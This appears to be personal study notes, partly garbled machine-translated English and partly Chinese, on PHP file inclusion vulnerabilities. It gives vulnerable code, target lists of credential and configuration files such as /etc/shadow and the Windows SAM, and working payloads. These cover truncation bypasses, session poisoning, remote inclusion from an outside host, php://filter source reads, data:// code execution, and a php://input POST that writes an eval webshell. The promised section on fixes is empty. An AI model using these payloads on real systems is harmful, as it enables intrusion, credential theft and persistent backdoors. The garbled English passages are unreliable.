Foreword
After breakfast start brushing up on offense and defense of the world title, a simple file containing all questions I did not do this I had to come up with to buy the book from scratch learning summary file contains a loophole!
First, the file contains loopholes
File Inclusion Vulnerabilities
Parameter file contains the function is not filtered or strictly defined and user parameters may be controlled, so that it may contain unintended file. If malicious code file, no matter what type of file, the malicious code within the file will be parsed and executed.
File Inclusion Vulnerabilities be willing to cause the server to pages to be tampered with, the site was linked to horse, the server is remote control, is to install a backdoor and other hazards.
Common file containing the function:
1.include () includes and setting documents. A warning (E_WARNING) if an error occurs, the basic will continue to run.
2.include_once () included during script execution to develop and run the file. And include differences: Check to be included too, if it will not be included again.
3.require () includes and evaluates the specified file. require several times to produce E_COMPLE_ERROR error when an error occurs, the script is halted
4.require_once () and require substantially complete and require the same distinction: Check that had been included, and if so, will not be included again.
Vulnerability sample code:
<?php $filename = $_GET['filename']; include($filename); ?>
The above code, $ _GET [ 'filename'] parameter is not rigorous filtered, directly into the include () function, an attacker can modify the $ _GET [ 'filename'] value, loading additional files, perform operations unintended , thus creating a file that contains the vulnerability;
We together with our current directory can be read later in the file 1.txt 1.txt content is displayed
Second, unlimited local file that contains the vulnerability
Unlimited Local File Inclusion Vulnerabilities
Unlimited Local File Inclusion Vulnerabilities that are not formulated to contain a specific prefix code file or .php, .html file name extensions, so an attacker could exploit the vulnerability to read files contain other files in the operating system, access to sensitive information or perform other documents in code.
Common sensitive information path
Windows
c: \ boot.ini // Check system version
c: \ XX \ httpd.conf Apache configuration information
c: \ windows \ system32 \ inetsrv \ MetaBase.xml // IIS configuration file
c: \ windows \ repair \ sam // storage system first installed Windows password
c: \ ProgramFiles \ mysql \ my.ini // MySQL arrangement
c:\ProgramFiles\mysql\data\mysql\user.MYD // MySQL root密码
c: \ windows \ php.ini // php configuration information
Linux/Unix
/ Etc / passwd account information
/ Etc / shadow account password file
/etc/httpd/conf/httpd.conf Apache configuration file
/etc/my.conf mysql configuration file
/usr/local/app/apache2/conf/httpd.conf Apache2 default profile
/usr/local/app/apache2/conf/extra/httpd-vhost.conf configure virtual Web site
/usr/local/app/php5/lib/php.ini PHP configuration
Unlimited Local File Inclusion Vulnerabilities example:
<?php $filename = $_GET['filename']; include($filename); ?>
Exploit read Mysql configuration information
payload:
http://127.0.0.1/test.php?filename=C:\phpStudy\PHPTutorial\MySQL\my.ini
Unlimited local use include vulnerability to execute code
Third, there is a limit local file that contains loopholes
Summary:
Limited local file inclusion vulnerability in the code refers to the development of a specific prefix to include files or .php , .html file name extensions, the attacker would need to bypass the prefix or extension filter, in order to exploit the vulnerability to read files containing the operating system other documents, access to sensitive information. Common restrictions include local files to bypass the filter main ways : there % 00 truncates the file that contains the path length truncate the file contains, dot truncate the file that contains all three
Test code :
<?php $filename = $_GET['filename']; include($filename,".html"); ?>
1.%00截断
%00会被认为是结束符,后面的数据会被直接忽略,导致扩展名截断。攻击者可以利用这个漏洞绕过扩展名过滤
漏洞利用条件:
(1) magic_quotes_gpc=off
(2) PHP<5.3.4
测试结果;
Payload: http://127.0.0.1/test.php?filename=xiaohua.txt%00
通过%00截断了后面的.html扩展名过滤,成功读取了xiaohua.txt文件的内容
2.路径长度截断文件包含
操作系统存在最大路径长度的限制。可以输入超过最大路径长度的目录,这样系统就会将后面的路径丢弃,导致扩展名截断
漏洞利用条件
Windows下目录的最大路径256B
Linux下目录的最大路径长度为4096B
测试payload:
执行完成后成功截断后面的.html扩展名,包含了xiaohua.txt文件
3.点号阶段文件包含
点号截断适用于Windows系统,当点号的长度大于256B时,就可以造成扩展名截断。
测试payload:
http://127.0.0.1/test.php?filename=xiaohua.txt....................................................................................................................................................................................................................................................................
成功使用.号截断后面的.html扩展名,包含了我们想要的文件。
四、Session文件包含
定义:
当可以获取Session文件的路径并且Session文件的内容可控时,就可以通过包含Session内容可控。
利用条件:
1. Session的存储位置可以获取
2. Session内容可控
(1) 通过phpinfo的信息获取session的存储位置
Phpinfo中的session.save_path保存的是Session的存储位置。通过phpinfo的信息获取session.save_path为/var/lib/php。
<?php session_start(); $ctfs = $_GET['ctfs']; $_SESSION['username']=$ctfs; ?>
此代码的$ctfs变量的值可以通过GET型ctfs参数传入。PHP代码将会获得GET型ctfs变量的值存入Session中。攻击者可以利用GET型ctfs参数将而已代码写入Session文件中,然后再利用文件包含漏洞包含此Session文件,向系统中传入恶意代
码。
漏洞利用payload:
http://127.0.0.1/test.php?ctfs=<?php phpinfo(); ?> 将php语句写入session中
http://127.0.0.1/test.php?filename=C:\phpStudy\PHPTutorial\tmp\tmp\sess_c3b4faa1f3b28c602c862bdf366fd92c 包含session文件
session文件名(真正的文件名默认都有个前缀就是sess_)
五、远程文件包含
一、无限制远程文件包含
无限制远程文件包含是指文件的位置并不是本地服务器,而是通过URL形式包含其他服务器上的文件,执行文件中的恶意代码。
漏洞利用条件:
(1) allow_url_fopen=on
(2) allow_url_include=on
漏洞代码
<?php $filename = $_GET['filename']; include($filename); ?>
Payload:
http://127.0.0.1/test.php?filename=http://192.168.1.110/xiaohua.txt
包含在xiaohua.txt中的PHP代码通过远程文件包含被成功当成PHP代码解析。
二、有限制远程文件包含
有限制远程文件包含是指当代吗中存在特定的前缀或者.php、.html等扩展名过滤时,攻击者仅需要绕过前缀或者扩展名过滤,才能执行远程URL中恶意代码。
漏洞代码:
<?php $filename = $_GET['filename']; include($filename.”.html”); ?>
1. 问号绕过
http://127.0.0.1/test.php?filename=http://192.168.1.110/xiaohua.txt?
2. #号绕过
http://127.0.0.1/test.php?filename=http://192.168.1.110/xiaohua.txt%23(#号要编码)
3. 空格绕过
http://127.0.0.1/test.php?filename=http://192.168.1.110/xiaohua.txt%20(%20是空格的url编码)
FUZZ可以大量检测
六、PHP伪协议
PHP带了很多内置URL风格的封装协议,可用于fopen、copy、file_exists和filesize等文件系统函数。除了这些内置封装协议,还能通过stream_wrapper_register注册自定义的封装协议。这些协议都被称为伪协议。
File:// ——访问本地文件系统
http:// ——访问HTTP(s)网址
ftp:// ——访问FTP(s)URLs
php:// 访问各个输入/输出流(I/o streams)
zlib:// 压缩流
data:// 读取数据(RFC2397)
glob:// 查找匹配的文件路径模式
phar:// PHP归档
ssh2:// Secure Sheel2
rar:// RAR
ogg:// 音频流
expect:// 处理交互式的流
php://伪协议
php://伪协议是PHP提供的一些输入输出流访问功能,允许访问PHP的输入输出流,标准输入输出和错误描述符,内存中、磁盘备份的临时文件流,以及可以操作其他读取和写入文件资源的过滤器。
1. php://filter
php://filter 是元封装器,设计用于数据流打开时的筛选过滤应用,对本地磁盘文件进行读写。
漏洞利用条件:
利用php:filter读本地磁盘文件时不需要开启allow_url_fopen和allow_url_include
用法:
(1):filename=php://filter/read=convert.base64-encode/resource=xx.php (2):filename=php://filter/convert.base64-encode/resource=xxx.php
参数:
Resource=<要过滤的数据流> 必需
read=<读链的筛选列表> 可选
write=<写链的筛选器列表> 可选
漏洞代码:
<?php $filename = $_GET['filename']; include($filename); ?>
Pyload:
http://127.0.0.1/test.php?filename=php://filter/read=convert.base64-encode/resource=test.php
利用php://filter获取了test.php文件的Base64编码
2. php://input
php://input可以访问请求的原始数据的只读流,即可以直接读取POST上没有经过解析的原始数据,但是使用enctype=”multipart/form-data”的时候php://input是无效的。
(1):读取POST数据
利用条件:
示例代码:
<?php echo file_get_contents("php://input") ?>
上面代码输出file_get_contents函数获取的php://input数据。测试传入POST数据 字符串xiaohua最终输出该字符串 。php://input可以获取POST传入的树
(2)写入木马
利用环境:
需要开启allow_url_include=on
漏洞代码:
<?php $filename=$_GET['filename']; include($filename); ?>
Payload:
URL: http://192.168.1.110/test.php?filename=php://input POST:<?php fputs(fopen('shell.php','w'),'<?php @eval($_POST[xiaohua])>')?>
通过php://input执行后成功在网站根目录创建了shell.php
(3) 执行命令
根写入木马漏洞代码操作基本类似知识post部分需要改
Post:<?php system(‘whoami’);?>
url: http://192.168.1.110/test.php?filename=php://input
3. file://伪协议
file://伪协议可以访问本地文件系统,读取文件的内容
示例代码:
<?php $filename=$_GET['filename']; include($filename); ?>
Payload:
http://192.168.1.110/test.php?filename=file://C:\phpStudy\PHPTutorial\WWW\xiaohua.txt
4. data://伪协议
php5.2.0起,数据流封装器开始有效,主要用于数据流的读取。如果传入的数据是PHP代码,就会执行代码
利用环境:
allow_url_include=on
allow_url_fopen=on
使用方法:
data://text/plain;base64,xxxx(base64编码后的数据)
代码示例
<?php $filename=$_GET['filename']; include($filename); ?>
对<?php system("dir")?>进行base64编码
PD9waHAgc3lzdGVtKCJkaXIiKT8+ 最后有个+号进行url编码+=%2b
最终payload:
http://192.168.1.110/test.php?filename=data://text/plain;base64,PD9waHAgc3lzdGVtKCJkaXIiKT8%2b
5. phar://伪协议
phar://是用来进行解压的伪协议,phar://参数中的文件不管是什么扩展名,都会被当做压缩包
利用环境
PHP>5.3.0
Allow_url_include=on
Allow_url_fopen=on
示例代码:
<?php $filename=$_GET['filename']; include($filename); ?>
用法:
?file=phar://压缩包/内部文件->phar://xxx.png/shell.php
压缩包要用zip://伪协议压缩,而不能用rar://伪协议
Payload:192.168.1.110/test.php?filename=phar://shell.png/shell.php
6. zip://伪协议
zip://伪协议和phar://伪协议在原理上类似,用法不一样
利用环境
PHP>5.3.0
Allow_url_include=on
Allow_url_fopen=on
示例代码:
<?php $filename=$_GET['filename']; include($filename); ?>
用法:
?file=zip://[压缩文件绝对路径]#[压缩文件内的子文件名]
Eg:zip://xxx.png#shell.php
Payload: 192.168.1.110/test.php?filename=zip//shell.png:shell.php
7. expect://伪协议
expect://伪协议主要用来执行系统命令,但是需要安装扩展
用法
?file=expect://ls
文件包含漏洞修复
参考学习:<<web安全原理分析与实践>>